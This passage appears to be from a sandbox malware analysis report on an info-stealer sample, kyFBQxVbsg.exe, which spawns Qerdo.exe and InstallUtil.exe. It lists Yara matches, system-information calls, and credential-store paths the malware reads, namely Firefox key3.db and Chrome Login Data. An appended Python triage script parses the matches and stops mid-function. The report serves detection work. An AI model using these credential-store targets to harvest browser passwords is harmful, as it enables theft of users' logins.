Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe Queries volume information: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe Queries volume information: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00431590 cpuid 17_2_00431590
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00404F28 GetLocalTime,CreateEventA,CreateThread, 17_2_00404F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_004451D0 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 17_2_004451D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00417E20 GetComputerNameExW,GetUserNameW, 17_2_00417E20

Stealing of Sensitive Information

Source: Yara match File source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.596165958.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.608522925.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: kyFBQxVbsg.exe PID: 6232, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6528, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Qerdo.exe PID: 6216, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Qerdo.exe PID: 5652, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 5836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6304, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 17_2_0040A1C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: \key3.db 17_2_0040A1C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 17_2_0040A0A6

Remote Access Functionality

Source: Yara match File source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.596165958.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.608522925.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: kyFBQxVbsg.exe PID: 6232, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6528, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Qerdo.exe PID: 6216, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Qerdo.exe PID: 5652, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 5836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6304, type: MEMORYSTR
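The memory dump names above carry the process index, dump stage, base address and region flags that let you tell which process and which region each Yara hit landed in. The following Python script is an added triage example, not part of this report or of any sandbox tooling; it parses lines copied from the list above. The field layout it assumes for the .sdmp names is inferred from this page only (the leading hex field 0x11 / 0x13 / 0x1A / 0x00 lines up with the decimal process index 17 / 19 / 26 / 0 in the *.unpack names), and the reading of the fifth and seventh fields as Win32 PAGE_* protection and MEM_* type constants is likewise an assumption, consistent with the values seen here (0x40 and 0x04, 0x20000).

```python
import re
from collections import defaultdict

# Constructed input: lines copied from the Yara match list in this report, embedded so the script runs offline.
SAMPLE_LINES = """\
Source: Yara match File source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6528, type: MEMORYSTR
"""

# *.unpack names: <process index, decimal>.<stage>.<process>.<base, hex>.<n>[.raw].unpack
UNPACK_RE = re.compile(
    r"File source: (?P<idx>\d+)\.(?P<stage>\d)\.(?P<proc>.+?\.exe)\.(?P<base>[0-9a-f]+)\.\d+(?:\.raw)?\.unpack",
    re.I,
)
# ASSUMED layout of a .sdmp name, inferred from this report only:
# <process index, hex>.<stage, hex>.<dump id>.<base address, hex>.<protection>.<unknown>.<region type>.<unknown>.sdmp
SDMP_RE = re.compile(
    r"File source: (?P<idx>[0-9a-f]{8})\.(?P<stage>[0-9a-f]{8})\.\d+\.(?P<base>[0-9a-f]{16})"
    r"\.(?P<prot>[0-9a-f]{8})\.[0-9a-f]{8}\.(?P<mtype>[0-9a-f]{8})\.",
    re.I,
)

# ASSUMPTION: these fields are Win32 PAGE_* protection and MEM_* region type constants.
PAGE_FLAGS = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


def index_to_process(text):
    """Map the numeric process index to a process name using the *.unpack lines."""
    return {int(m["idx"]): m["proc"] for m in UNPACK_RE.finditer(text)}


def parse_memory_matches(text):
    """Yield one record per .sdmp match with the index, stage, base and flags decoded."""
    names = index_to_process(text)
    for m in SDMP_RE.finditer(text):
        idx = int(m["idx"], 16)
        prot = int(m["prot"], 16)
        mtype = int(m["mtype"], 16)
        yield {
            "index": idx,
            "process": names.get(idx, f"index {idx} (no unpack line)"),
            "stage": int(m["stage"], 16),
            "base": int(m["base"], 16),
            "protection": PAGE_FLAGS.get(prot, hex(prot)),
            "type": MEM_TYPES.get(mtype, hex(mtype)),
        }


def summarize(text):
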